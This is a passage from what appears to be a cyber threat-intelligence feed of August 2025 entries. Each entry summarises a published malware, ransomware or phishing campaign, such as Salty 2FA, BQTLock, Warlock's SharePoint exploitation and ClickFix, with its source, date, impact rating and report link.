Summary:: Researchers at ANY.RUN have identified Salty 2FA, a newly emerging Phishing-as-a-Service (PhaaS) platform built to harvest Microsoft 365 credentials while bypassing multi-factor authentication (MFA). The framework employs a multi-stage execution chain and advanced evasion methods to evade detection. It hosts fake login pages under [.]ru subdomains and delivers them through obfuscated JavaScript. Salty 2FA is capable of intercepting multiple forms of MFA, including SMS codes, authentication app push notifications, voice-based OTPs, and phone call verifications. This enables attackers to compromise accounts even when MFA protections are enabled. Since late July 2025, the platform has been actively deployed across industries in both the United States and European Union, with phishing lures tailored to specific sectors and organizations.

Source: https://any.run/cybersecurity-blog/salty2fa-technical-analysis/

Intel Source:: Koi Security

Intel Name:: FreeVPN_Chrome_Extension_Captures_User_Data

Date of Scan:: 2025-08-26

Impact:: MEDIUM

Summary:: Researchers at Koi Security have identified that the Chrome extension FreeVPN.One, recently rebranded as “AI Threat Detector”, is operating as spyware. The extension secretly takes screenshots of every website a user visits and exfiltrate them to attackers-controlled servers without user consent. The stolen screenshots include login credentials, financial details, personal photos, company documents, and even location data. This extension initially launched as a legitimate VPN but gradually evolved into a malicious tool through incremental updates in 2025. The attackers employ AES-256-GCM with RSA encryption and domain rotation to evade network monitoring.

Source: https://www.koi.security/blog/spyvpn-the-vpn-that-secretly-captures-your-screen#heading-5

Intel Source:: Google Threat Intelligence

Intel Name:: UNC6384_Captive_Portal_Hijack_Delivers_SOGU_SEC

Date of Scan:: 2025-08-26

Impact:: MEDIUM

Summary:: Researchers at Google Threat Intelligence Group (GTIG) have observed a captive-portal hijacking campaign attributed to PRC-nexus actor UNC6384 that targets diplomats. The operation silently reroutes routine browser connectivity probes through compromised edge devices, inserting an adversary-in-the-middle that serves a fake “plugin update” page. Victims who accept the lure receive a digitally signed downloader, STATICPLUGIN, which in turn pulls an MSI and side-loads CANONSTAGER. CANONSTAGER decrypts and executes the memory-only backdoor SOGU.SEC, granting the actor remote command shell, file transfer and host reconnaissance. GTIG notes the use of valid code-signing certificates, HTTPS lures and custom API hashing to reduce detection and extend dwell time. Campaign telemetry shows primary focus on government and diplomatic networks in Southeast Asia, with infrastructure touching additional global entities, indicating wider collection priorities. Successful compromise enables persistent access and covert exfiltration of sensitive state information.

Source: https://cloud.google.com/blog/topics/threat-intelligence/prc-nexus-espionage-targets-diplomats/

Intel Source:: Qi'anxin Threat Intelligence Center

Intel Name:: TianQing_Blocks_Silver_Fox_Trojan_by_Default

Date of Scan:: 2025-08-25

Impact:: MEDIUM

Summary:: Qi'anxin Threat Intelligence Center have identified that the Silver Fox (Ghost) Trojan is being delivered through installer packages that carry valid Chinese code-signing certificates, allowing the malware’s loader to decrypt and run the backdoor directly in memory. Once executed, the threat injects itself into explorer.exe to establish an in-memory command-and-control channel while leaving no files on disk. This fileless approach, coupled with legitimate signatures, bypasses signature-based AV and many EDR products. Operators gain remote access that can support espionage tasks such as command execution and data collection, though no destructive activity has been observed. Campaigns attributed to foreign APT groups have repeatedly targeted organisations within China, illustrating continued interest in covert intelligence gathering against domestic entities.

Source: https://mp.weixin.qq.com/s?__biz=MzI5Mzg5MDM3NQ==&mid=2247498528&idx=1&sn=c3b6d66eb3c426e906fc12601a776fdc&poc_token=HJeXpWijUZm0zzCNaGnF_KVPFRhE0aUubPtOzf7K

Intel Source:: Cert-AGID

Intel Name:: Fake_Digital_Signature_Update_Campaign

Date of Scan:: 2025-08-25

Impact:: LOW

Summary:: Researchers from CERT-AGID have identified a phishing campaign targeting multiple Italian public administrations. The attackers send spear-phishing emails masquerading as urgent notifications regarding a “digital signature” security update, instructing recipients to download a ZIP archive containing a VBS installer script. Once executed, the script downloads and installs a signed MSI package for Action1, a legitimate remote management tool. This gives attackers persistent administrative access to compromised system.

Source: https://cert-agid.gov.it/news/falsa-patch-per-firma-digitale-diffonde-malware/

Intel Source:: K7 Labs

Intel Name:: BQTLock_Ransomware_Double_Extortion_RaaS_Targets_Windows

Date of Scan:: 2025-08-24

Impact:: MEDIUM

Summary:: Researchers at K7 Security Labs have identified BQTLock as an emerging ransomware-as-a-service (RaaS) family first observed in mid-July 2025. Operated by a threat actor using the handle “ZeroDayX,” the service arms affiliates with a point-and-click builder, host-wide encryptor and a Tor-based leak site to enable classic double-extortion campaigns. The malware applies hybrid AES-256/RSA-4096 encryption, appends “.bqtlock” to files and threatens public release of stolen data if payment is not received within 48 hours. Before encryption it collects host details, screenshots and logs, exfiltrating them through a Discord webhook to strengthen extortion leverage. BQTLock features anti-debug checks, multiple UAC-bypass paths, process hollowing, scheduled-task persistence and deletion of shadow copies, all of which complicate response and recovery.

Source: https://labs.k7computing.com/index.php/examining-the-tactics-of-bqtlock-ransomware-its-variants/

Intel Source:: CloudSek

Intel Name:: TA_NATALSTATUS_Cryptojacking_Campaign

Date of Scan:: 2025-08-24

Impact:: MEDIUM

Summary:: CloudSEK researchers have uncovered an advanced cryptojacking campaign operated by the group TA-NATALSTATUS, active since 2020, that exploits misconfigured Redis servers. The attackers leverage malicious cron jobs to gain root-level access without needing privilege escalation. Their tools incorporate binary hijacking, command obfuscation, and timestamp manipulation, enabling them to evade detection. The campaign follows four-stage lifecycle —implantation, setup, lateral scanning, and persistence where each compromised machine automatically searches for addition Redis servers. Once inside, the attackers disable SELinux, firewalls, and competing malware to monopolize CPU resources for Monero mining. Victims have been observed across the U.S., Europe, Russia, India, and other regions, showing the campaign’s global scale.

Source: https://www.cloudsek.com/blog/the-ghost-in-the-machine-the-complete-dossier-on-ta-natalstatus-and-the-cryptojacking-turf-war

Intel Source:: IBM-X Force

Intel Name:: QuirkyLoader_Drops_Infostealers_and_RATs

Date of Scan:: 2025-08-24

Impact:: MEDIUM

Summary:: IBM X-Force researchers have identified a new Windows malware loader called QuirkyLoader which has been active since November 2024. The malware is distributed through spam emails containing password-protected archives. Each archive typically includes a legitimate executable, an encrypted payload, and a malicious DLL file. When executed, QuirkyLoader leverages DLL side-loading to run the malicious DLL, which then performs process hollowing and decrypts the final payload directly in memory. QuirkyLoader has been observed delivering well-known malware families such as Agent Tesla, AsyncRAT, FormBook, MassLogger, Remcos, Rhadamanthys, and Snake Keylogger. These payloads enable credential theft and provide attackers with full remote access to compromised systems. Recent campaign activity shows targeting of Nusoft employees in Taiwan, along with opportunistic attacks against individuals in Mexico.

Source: https://www.ibm.com/think/x-force/ibm-x-force-threat-analysis-quirkyloader

Intel Source:: The Hacker Wire

Intel Name:: WarLock_Hits_Colt_via_SharePoint_Zero_Day

Date of Scan:: 2025-08-23

Impact:: MEDIUM

Summary:: The Hacker Wire researchers have observed that the WarLock ransomware group leveraged the zero-day CVE-2025-53770 in Microsoft SharePoint to gain SYSTEM-level access to Colt Technology Services’ exposed portal. After initial exploitation, the attackers deployed a custom loader and PowerShell scripts to pivot across more than ten internal Windows servers, escalating privileges and disabling security controls. WarLock simultaneously exfiltrated sensitive corporate data, including salary tables and network diagrams, before encrypting approximately 30 TB of file shares with its proprietary ransomware payload. The campaign demonstrates the actor’s continued focus on unpatched Microsoft Office stack components and its capability to blend living-off-the-land binaries with DLL injection to evade EDR and SIEM detection.

Source: https://www.thehackerwire.com/warlock-hits-colt-via-cve%E2%80%912025%E2%80%9153770-sharepoint-exploit/

Intel Source:: Crowdstrike

Intel Name:: COOKIE_SPIDER_SHAMOS_stealer_via_macOS_malvertising

Date of Scan:: 2025-08-23

Impact:: MEDIUM

Summary:: Researchers at CrowdStrike have observed the cyber-criminal group COOKIE SPIDER distributing a macOS variant of Atomic Stealer dubbed SHAMOS between June and August 2025. The campaign relied on search-engine malvertising that impersonated legitimate troubleshooting sites to lure users. Victims were instructed to execute a one-line Terminal command that silently downloaded a Bash installer, bypassed Gatekeeper, and deployed the Mach-O payload. SHAMOS then conducted anti-VM checks, harvested Keychain items, browser credentials and cryptocurrency wallet files via AppleScript, and exfiltrated them over HTTP. The stealer also dropped an additional botnet module and achieved persistence with LaunchDaemons to maintain long-term access.

Source: https://www.crowdstrike.com/en-us/blog/falcon-prevents-cookie-spider-shamos-delivery-macos/

Intel Source:: Google Cloud/Mandiant

Intel Name:: CORNFLAKE_V3_Backdoor_Campaign

Date of Scan:: 2025-08-23

Impact:: MEDIUM

Summary:: Researchers from Mandiant have uncovered that the financially motivated group UNC5518 is compromising legitimate websites to deliver fake CAPTCHA pages in a campaign known as ClickFix. The group provides initial access as a service to other actors, including UNC5774, which leverages this access to deploy the CORNFLAKE.V3 backdoor. The malware is distributed in JavaScript and PHP variants and establishes HTTPS connections to attacker-controlled infrastructure for C2. Once installed, it collects system details, conducts reconnaissance, harvest credential via Kerberoasting, and maintains persistence via registry run keys and scheduled tasks. The malware also abuses Cloudflare Tunnels for stealthy communications. Additionally, the PowerShell-based droppers that that install Node.js on victim machines to execute the backdoor, incorporating anti-VM checks to evade detection.

Source: https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflake-v3-backdoor/

Intel Source:: Trend Micro

Intel Name:: SharePoint_Exploit_Enables_Enterprise_Wide_Ransomware

Date of Scan:: 2025-08-23

Impact:: HIGH

Summary:: Trend Micro reports that the Warlock ransomware group is exploiting unpatched on-premise Microsoft SharePoint servers to gain initial footholds, escalate privileges through malicious Group Policy Objects, and deploy a LockBit-derived payload across victim networks. Once inside, Warlock disables security tooling with a bespoke KillAV driver, performs credential dumping with Mimikatz, and propagates laterally via SMB and RDP configuration changes. Reconnaissance and domain-trust discovery are conducted using built-in Windows utilities before data is exfiltrated with a renamed RClone binary and files are encrypted with the .x2anylock extension. Victims span government, technology, finance, manufacturing, and critical-infrastructure sectors across North America, Europe, Asia, and Africa, underscoring broad operational scope. The campaign demonstrates rapid weaponisation of public-facing application flaws and highlights the business impact of delayed patching, ineffective privilege hygiene, and insufficient defense-in-depth.

Source: https://www.trendmicro.com/en_us/research/25/h/warlock-ransomware.html

Intel Source:: Microsoft

Intel Name:: Attackers_Deliver_Multiple_Stealer_and_RAT_via_Clickfix

Date of Scan:: 2025-08-22

Impact:: MEDIUM

Summary:: Microsoft researchers have discovered that several financially motivated threat actors are abusing ClickFix technique to trick users into executing malicious commands via Windows Run, PowerShell, or the macOS Terminal. The campaigns, active since early 2024 deliver malware such as Lumma Stealer, ScreenConnect RAT, and Atomic macOS Stealer to steal credentials, compromise cryptocurrency wallets, and enable remote access. They achieve Initial access through phishing, malvertising, and drive-by downloads. To evade detection, the attackers disguise scripts with misleading file, employ multi-step obfuscation, and deploy fake Cloudflare security checks. Once executed, the malware rapidly exfiltrates sensitive data and gives attackers direct access for further malicious activity. Confirmed victims include organizations in the government, education, transportation, and finance sectors across Europe, North America, and Latin America.

Source: https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

Intel Source:: Cofense

Intel Name:: SendGrid_Campaign

Date of Scan:: 2025-08-22

Impact:: LOW

Summary:: Cofense researchers have identified a phishing campaign that abuses SendGrid’s email services to steal user credentials. The attackers distribute phishing emails through SendGrid’s platform to evade security filters. The campaign leverages three main lures such as New Login Location Alert, Elite Tier Promotion, Phone Number Changed Alert. All three emails use spoofed sender addresses, polished formatting, and official-looking logos to appear legitimate. Additionally, the attackers exploit an open redirect vulnerability to make their malicious links as legitimate. Victims who click these links are redirected to a phishing site (loginportalsg[.]com) that closely mimic SendGrid’s official login page, tricking victims into disclosing their credentials.

Source: https://cofense.com/blog/phishing-in-the-cloud-sendgrid-campaign-exploits-account-security

Intel Source:: cloudsek

Intel Name:: APT36_Linux_Phishing_Targets_Indian_Defence

Date of Scan:: 2025-08-21

Impact:: MEDIUM

Summary:: Researchers at CloudSEK have observed Pakistan-linked APT36 (aka Transparent Tribe) weaponising Linux .desktop shortcut files to spear-phish Indian defence and government personnel. The attackers email ZIP archives containing shortcuts disguised as procurement documents. When a victim clicks, the shortcut downloads a Go-based payload from Google Drive, writes it to /tmp, executes it, and displays a decoy PDF to reduce suspicion. The payload installs GNOME autostart entries and performs anti-analysis checks to evade sandboxes. It then initiates a WebSocket channel to external command-and-control infrastructure, enabling interactive commands and silent file exfiltration. These behaviours confirm an espionage objective focused on sensitive procurement and operational data, not destruction or extortion. The campaign demonstrates APT36’s expanding Linux capability, effective cloud-hosted delivery, and icon spoofing for user deception. Successful compromise grants persistent, covert access to India’s strategic defence ecosystem, posing significant national-security risk.

Source: https://www.cloudsek.com/blog/investigation-report-apt36-malware-campaign-using-desktop-entry-files-and-google-drive-payload-delivery

Intel Source:: Reasonlabs

Intel Name:: A_Large_Scale_Trojan_Campaign

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: ReasonLabs researchers have uncovered a large-scale Trojan campaign that leverages fake download websites to distribute malicious Chrome and Edge extensions, affecting over 300,000 Windows devices worldwide. Once installed, the malware deploys a staged PowerShell dropper that creates a scheduled task with deceptive names such as PrivacyBlocker_PR1 or NvOptimizerTaskUpdater_V2. This dropper executes a second-stage script entirely in memory to evade antivirus tools. The script then force-installs malicious browser extensions via registry policies, ensuring their persistence even in Developer Mode. It retrieves additional JavaScript, CSS, HTML, and image files from attacker-controlled domains to hijack search queries and redirect users to adversary-controlled search engines.

Source: https://reasonlabs.com/research/new-widespread-extension-trojan-malware-campaign

Intel Source:: Esentire

Intel Name:: Interlock_Group_Evolving_Malware_Arsenal

Date of Scan:: 2025-08-18

Impact:: HIGH

Summary:: Researchers at eSentire have identified a sophisticated multi stage campaign against Windows endpoints since September 2024, leveraging a compromised Kongtuke portal and a social-engineering lure dubbed ClickFix to execute malicious PowerShell payloads. Those payloads deploy a PHP-based backdoor (“Interlock RAT”) and a custom launcher via LOLBin abuse, followed by a NodeJS-based RAT (NodeSnake) for reconnaissance and data theft. A self-injecting C backdoor then establishes persistent C2 over TCP 443 using XOR-encrypted JSON, supports arbitrary command execution, and self-deletion routines to evade detection.

Source: https://www.esentire.com/blog/unmasking-interlock-groups-evolving-malware-arsenal

Intel Source:: unit42

Intel Name:: DarkCloud_Stealer_VB6_Infection_Chain

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: Researchers at Unit 42 have observed DarkCloud Stealer operators switching to a layered delivery chain that begins with phishing archives containing obfuscated JavaScript or WSF downloaders. These scripts retrieve a PowerShell loader that drops a ConfuserEx-protected .NET executable, which then injects a Visual Basic 6 payload into RegAsm.exe via process-hollowing. The revamped tooling leverages anti-tamper, control-flow, and constant-encoding protections alongside RC4 and 3DES-encrypted strings, complicating detection and analysis.

Source: https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain/

Intel Source:: Resecurity

Intel Name:: Blue_Locker_Ransomware

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: Researchers at Resecurity have identified a new ransomware variant called Blue Locker, which is actively targeting Pakistan’s oil and gas sector as well as multiple government ministries. Blue Locker leverages a PowerShell-based loader to disable security controls, escalate privileges, and deploy its ransomware payload. Persistence is maintained through Registry Run keys, while shadow copies are deleted to hinder recovery efforts. Once executed, the malware appends the [.]Blue extension to encrypted files, selectively targets specific file types, and uses a combination of AES and RSA encryption to secure victim data. Ransom notes are dropped instructing victims to negotiate payment through email or instant messaging channels rather than a public leak site. Pakistan’s National CERT has attributed Blue Locker to the Shinra malware family, noting similarities with Conti and Black Basta.

Source: https://www.resecurity.com/blog/article/blue-locker-analysis-ransomware-targeting-oil-gas-sector-in-pakistan

Intel Source:: Polyswarm

Intel Name:: Plague_Linux_PAM_Backdoor

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: Researchers at PolySwarm have identified a new Linux backdoor, “Plague,” that integrates into the PAM authentication framework to provide attackers with covert SSH access and long-term persistence. The malware is deployed as a malicious authentication module, granting static backdoor credentials and bypassing security controls while remaining hidden through log suppression and environment tampering. Initial discovery was credited to Nextron Systems, with subsequent analysis showing multiple compiled variants across different Linux distributions, none of which were detected by antivirus engines. The implant demonstrates advanced anti-analysis features, including execution checks to evade sandboxes and layered obfuscation that evolved across successive builds, suggesting ongoing development and operator investment.

Source: https://blog.polyswarm.io/plague-linux-backdoor

Intel Source:: Medium(Knownsec 404)

Intel Name:: Silver_Fox_Trojan_via_Fake_Flash_Plugin

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: Researchers at Knownsec 404 have identified a sustained malware campaign involving the Silver Fox Trojan, which is delivered through counterfeit software posing as Flash plugins and popular Chinese applications. Active since 2022, the campaign employs phishing tactics and fake download sites mimicking services like Google Translate, WPS Office, and Bit Browser to trick users into downloading malicious installers. These downloads execute MSI or EXE payloads that deploy the Winos Trojan, a modular remote access tool that persists by registering itself in the Windows registry and side-loading malicious DLLs. The malware leverages obfuscation, Golang-based binaries, and shellcode loaders to evade detection and deliver a wide range of plug-ins capable of keylogging, clipboard access, and data exfiltration.

Source: https://medium.com/@knownsec404team/analysis-of-the-latest-silver-fox-attack-campaign-disguised-as-a-flash-plugin-7cd92d193de1

Intel Source:: Seqrite

Intel Name:: Weaponized_SVG_Phishing

Date of Scan:: 2025-08-18

Impact:: MEDIUM

Summary:: Researchers at Seqrite have observed a spear-phishing campaign that delivers seemingly benign Scalable Vector Graphics files or cloud-hosted SVG links to enterprise users, aiming to seize cloud credentials. First detected on 7 August 2025, the attack relies on default Windows browsers to render the SVG, execute XOR-decoded JavaScript, funnel the session through a Cloudflare CAPTCHA, and present a counterfeit Microsoft 365 or Google Workspace login page for credential theft. Because SVGs lack macros or binaries, they evade standard attachment and URL filters, enabling rapid compromise of business email accounts that can support lateral movement, invoice fraud, and data exfiltration.

Source: https://www.seqrite.com/blog/unmasking-the-svg-threat-how-hackers-use-vector-graphics-for-phishing-attacks/

Intel Source:: ASEC

Intel Name:: Makop_RDP_Ransomware_Surge

Date of Scan:: 2025-08-18

Impact:: LOW

Summary:: Researchers at AhnLab Security Intelligence Center (ASEC) have observed a renewed Makop ransomware campaign that brute-forces exposed Remote Desktop Protocol services to gain initial access, escalates privileges with Mimikatz, and deploys a GUI-based encryptor using AES-256/RSA-1024. After foothold, operators install NirSoft credential tools, enabling lateral movement across Windows networks before encrypting hosts and deleting shadow copies and backup catalogs to obstruct recovery. The toolset and workflow resemble prior Crysis and Venus operations, suggesting shared infrastructure and a profit-driven objective. Activity dates to early 2024 and persists, with recent infections clustered in South Korea, underscoring continued targeting of organizations running internet-facing RDP with weak credentials.

Source: https://asec.ahnlab.com/en/89397/

Intel Source:: Zscaler

Intel Name:: A_new_Variant_of_Raspberry_Robin

Date of Scan:: 2025-08-17

Impact:: LOW

Summary:: Zscaler researchers have uncovered an advanced variant of the Raspberry Robin malware, also called Roshtyak, that has been active since 2021 and mainly distributes through infected USB drives targeting Windows systems. The malware now employs ChaCha-20 for network traffic encryption along with a modified RC4. Additionally, it exploits a recently disclosed Windows vulnerability (CVE-2024-38196) to gain SYSTEM privileges on compromised machines. Its C2 servers operate over TOR using onion domains that change dynamically with each sample. Notably, the malware enforces a one-week execution window, if not executed within this timeframe, it expires automatically.

Source: https://www.zscaler.com/blogs/security-research/tracking-updates-raspberry-robin

Intel Source:: CERT-UA

Intel Name:: UAC_0099_MATCHBOIL_Toolkit

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Researchers at CERT-UA have identified that in early August 2025 the UAC-0099 group executed targeted spear-phishing campaigns against Ukrainian state authorities, Defense Forces and military-industrial enterprises, delivering an HTA-based loader that installs a C# payload. The loader, named MATCHBOIL, fetches and decodes additional modules and establishes persistence via a scheduled task. Once deployed, the MATCHWOK backdoor issues AES-encrypted PowerShell commands over HTTPS, incorporating checks to evade analysis tools such as IDA Pro and Wireshark. In parallel, the DRAGSTARE stealer collects system information and browser credentials including DPAPI keys and SQLite databases then conducts recursive searches for documents and archives.

Source: https://cert.gov.ua/article/6284949

Intel Source:: Sentinel Labs

Intel Name:: PXA_Stealer_Leveraging_Telegram_C2

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Researchers at Sentinel LABS have identified a sophisticated, ongoing infostealer campaign utilizing an evolved version of the Python-based PXA Stealer in conjunction with Telegram-based command-and-control infrastructure. Active since at least October 2024 and continuing into July 2025, this campaign demonstrates a highly customized deployment chain that employs signed software sideloading, encrypted archives, sandbox evasion, and legitimate-looking decoy documents to bypass detection. The malware targets Windows systems and Chromium-based browsers, harvesting an extensive array of data including credentials, browser cookies, crypto wallet information, and authentication tokens.

Source: https://www.sentinelone.com/labs/ghost-in-the-zip-new-pxa-stealer-and-its-telegram-powered-ecosystem/

Intel Source:: Cisco Talos

Intel Name:: PS1Bot_Multi_Stage_Modular_Malware_Framework

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Researchers at Cisco Talos have observed PS1Bot, a multi-stage malware framework delivered via malvertising and SEO poisoning that targets Windows systems . The campaign begins with a malicious compressed archive that drops an obfuscated JavaScript downloader, which in turn retrieves PowerShell scripts keyed to the host’s drive serial number for C2 communications . Modules are dynamically compiled in-memory using PowerShell and C#, minimizing artifacts on disk while providing capabilities for antivirus detection, screen capture, keylogging and specialized cryptocurrency wallet theft . Infected hosts periodically poll an HTTP-based C2 server for new modules, facilitating rapid deployment of updated or additional functionality without writing payloads to disk .

Source: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/

Intel Source:: CERT UA

Intel Name:: LONEPAGE_Malware

Date of Scan:: 2025-08-17

Impact:: LOW

Summary:: Researchers from CERT-UA have uncovered a targeted cyber espionage campaign targeting Ukrainian government agencies and media representatives since mid-2022. The threat actor employs malicious attachment such as .HTA, .EXE, .RAR and .LNK delivered through email and instant messaging platforms to deploy a PowerShell-based loader called LONEPAGE, which fetches and executes additional payloads hosted within a remote txt file. These downloaded components include the THUMBCHOP browser stealers, CLOGFLAG keyloggers and Go-based backdoors SEAGLOW and OVERJAM, which facilitate credential theft and provide persistent remote access over HTTP, TOR, and SSH channels. The malware maintains persistence through scheduled tasks, while local network reconnaissance enables the identification and compromise of privileged systems to support lateral movement.

Source: https://cert.gov.ua/article/4818341

Intel Source:: Recorded Future

Intel Name:: Candiru_DevilsTongue_Spyware_Tracked_Globally

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Researchers at Insikt Group have uncovered new infrastructure linked to eight Candiru-associated clusters, comprising both victim-facing components used to deploy and control the sophisticated Windows malware DevilsTongue, and higher-tier operator infrastructure. DevilsTongue employs advanced techniques such as COM hijacking for persistence, a signed kernel-mode driver for stealthy API proxying, and in-memory execution of encrypted payloads, enabling it to extract files, browser data, LSASS credentials, and even encrypted Signal messages. The design of these clusters varies—some directly host victim-facing servers, while others use intermediary VPS layers or the Tor network to conceal activity. Five clusters, linked to Hungary and Saudi Arabia, are likely still active; one associated with Indonesia remained active until November 2024, while two tied to Azerbaijan remain unconfirmed due to a lack of observable infrastructure. The malware is primarily used to target high-value individuals such as politicians, business leaders, and community figures, exposing sensitive corporate and government information to potential espionage.

Source: https://assets.recordedfuture.com/content/dam/insikt-report-pdfs/2025/cta-2025-0805.pdf

Intel Source:: Bitdefender

Intel Name:: Curly_COMrades

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Bitdefender researchers have uncovered a new threat group dubbed Curly COMrades that has been active since mid-2024, targeting judicial and government agencies in Georgia and an energy distribution company in Moldova. The group focuses on stealing domain-level credentials through NTDS database extraction and LSASS memory dumps, enabling unrestricted lateral movement and long-term access. Curly COMrades employ stealthy techniques such as proxy tools (Resocks, SSH, Stunnel), scheduled tasks, compromised legitimate websites as relays, and remote command execution via curl or Atexec-like tools. Their tactics and targets indicate possible links to Russian intelligence operations, focusing on sustained network control and information theft.

Source: https://businessinsights.bitdefender.com/curly-comrades-new-threat-actor-targeting-geopolitical-hotbeds

Intel Source:: Dark Atlas

Intel Name:: Scattered_Spider_Identity_Siege

Date of Scan:: 2025-08-17

Impact:: MEDIUM

Summary:: Researchers at Darkatlas have observed Scattered Spider (UNC3944) pivoting from credential phishing to full-scale identity takeovers by replicating Okta login portals and weaponising Evilginx MitM proxies to hijack session tokens. Late-April 2025 attacks disrupted Marks & Spencer, Co-op and Harrods in the United Kingdom, mirroring the group’s 2023 compromises of MGM Resorts and Caesars Palace in the United States. The actor cycles clusters of NiceNIC-registered domains behind Cloudflare, Virtuo and Njalla infrastructure to frustrate takedowns. Targeted industries include retail, hospitality, financial services, telecommunications and cloud SaaS providers, underscoring a profit-driven campaign. The newly formed “Scattered LAPSUS$ Hunters” Telegram channel broadens extortion tactics with leak threats and unverified zero-day claims, signalling intent to escalate against government and luxury brands.

Source: https://darkatlas.io/blog/scattered-spider-unc3944-a-comprehensive-and-detailed-threat-profile

Intel Source:: Cato

Intel Name:: Oyster_Loader_Targets_Admins_via_Malvertising

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Researchers at Cato have identified an ongoing July–August 2025 malvertising campaign impersonating the official PuTTY download site to compromise technically skilled administrators and engineers. The operation delivers a trojanized installer hosted on a compromised WordPress real-estate domain, initiating a modular loader that retrieves its payload from a cloud CDN at runtime. The malware masks C2 traffic through spoofed update headers and maintains resilience with a scheduled task executing every three minutes.

Source: https://www.catonetworks.com/blog/cato-ctrl-oyster-malware-campaign/

Intel Source:: Intezer

Intel Name:: A_New_Variant_of_FireWood_Backdoor

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Researchers at Intezer have discovered a new variant of the FireWood backdoor targeting Linux systems. This version employs kernel-level rootkit modules and TEA-based encryption to evade detection and maintain persistence access. Once installed, it enables attackers to execute commands, collect system information and credentials, and conduct covert monitoring of compromised systems. It incorporates enhanced reliability in communicating with its C2 servers and ability to determine the operating system even when certain files are missing. The malware also maintains persistence by modifying system startup files. The attackers are believed to gain initial access through web shells on compromised Linux desktops.

Source: https://intezer.com/blog/threat-bulletin-firewood/

Intel Source:: Unit42

Intel Name:: A_Deep_Analysis_of_Donut_Malware

Date of Scan:: 2025-08-16

Impact:: LOW

Summary:: Unit42 researchers analyzed a Donut-generated shellcode loader designed to execute .NET assemblies directly in memory with a very small footprint. It leverages a call/pop/sub technique to determine its current location in memory, enabling it to run from any position without relying on a fixed address. The loader dynamically resolves required APIs (VirtualProtect) to mark its memory buffer as executable before loading and executing the payload. It also includes a disable_amsi function to bypass Windows Anti-Malware Scan Interface, preventing security tools from scanning the code. Additionally, the malware effectively evades signature-based detection and static analysis.

Source: https://unit42.paloaltonetworks.com/donut-malware-analysis-tutorial/

Intel Source:: Cofense

Intel Name:: LeeMe_Ransomware

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Researchers at Cofense have identified a new ransomware variant dubbed LeeMe Ransomware, distributed through spoofed SAP Ariba Quote emails containing a password-protected ZIP archive designed to evade sandbox detection. Once executed, the malware installs a deceptive SAP GUI and encrypts files using AES-256 encryption. The campaign is financially motivated, demanding a ransom of 0.46900 BTC. LeeMe also includes a built-in keylogger and credential stealer that activates upon detecting predefined sensitive keyword and exfiltrates data over GoFile and the Telegram Bot API. The ransomware presents victims with a payment demand, imposing a 48-hour deadline and providing contact through ProtonMail.

Source: https://cofense.com/blog/this-sap-ariba-quote-isn-t-what-it-seems-it-s-ransomware

Intel Source:: Hunt.IO

Intel Name:: APT_Sidewinder_Target_South_Asian_Countries

Date of Scan:: 2025-08-16

Impact:: LOW

Summary:: Researchers at Hunt.io have uncovered a phishing campaign conducted by APT Sidewinder, targeting government and military entities across South Asia, including Bangladesh, Nepal, Turkey, and Pakistan. The group’s primary objective is to harvest credential via spearphishing links that impersonate official Zimbra webmail and secure portal interfaces. The attackers host counterfeit login pages on free platforms like Netlify and Pages.dev then exfiltrate the stolen credentials through HTTP POST request to their own servers. They target victims including defense procurement agencies, military email portals, and national webmail systems, exposing high-value accounts to unauthorized access.

Source: https://hunt.io/blog/apt-sidewinder-netlify-government-phishing

Intel Source:: Trend Micro

Intel Name:: Crypto24_stealth_ransomware_operations

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have observed Crypto24 running coordinated, multi-stage ransomware intrusions that blend legitimate administration tools with custom malware to gain and persist elevated access while evading EDR, then exfiltrate data and encrypt systems. The group targets large enterprises across Asia, Europe, and the United States in financial services, manufacturing, entertainment, and technology. Operations center on Windows enterprise estates: operators create or reactivate privileged accounts, move laterally via PsExec and RDP/AnyDesk, patch termsrv.dll to enable concurrent sessions, and maintain surveillance with a keylogger while using Google Drive for stealthy exfiltration.

Source: https://www.trendmicro.com/en_no/research/25/h/crypto24-ransomware-stealth-attacks.html

Intel Source:: JPCERT

Intel Name:: CrossC2_Campaign_Targets_AD_via_Dual_OS_Loader

Date of Scan:: 2025-08-16

Impact:: MEDIUM

Summary:: Researchers at JPCERT have observed a campaign running from September to December 2024, involving the deployment of CrossC2—an unofficial, cross-platform Cobalt Strike Beacon builder—alongside a custom Nim-based loader known as ReadNimeLoader to stage Cobalt Strike on both Linux/macOS and Windows systems. The threat actor appears focused on achieving lateral movement and maintaining persistent access within Active Directory environments, utilizing tools such as PsExec, Plink (SSH), and SystemBC for remote access and data exfiltration. Key techniques include DLL sideloading of ReadNimeLoader via java.exe through scheduled tasks, multi-stage in-memory shellcode loading using OdinLdr, and various anti-analysis measures like XOR string encoding, junk-code insertion, and debug/time-based checks. The campaign primarily targeted Linux servers without EDR in conjunction with Windows AD infrastructure, with signs of compromise reported across multiple countries.

Source: https://blogs.jpcert.or.jp/en/2025/08/crossc2.html

Intel Source:: Trustwave

Intel Name:: EncryptHub_MMC_Social_Engineering_Exploitation

Date of Scan:: 2025-08-16

Impact:: MEDIUM

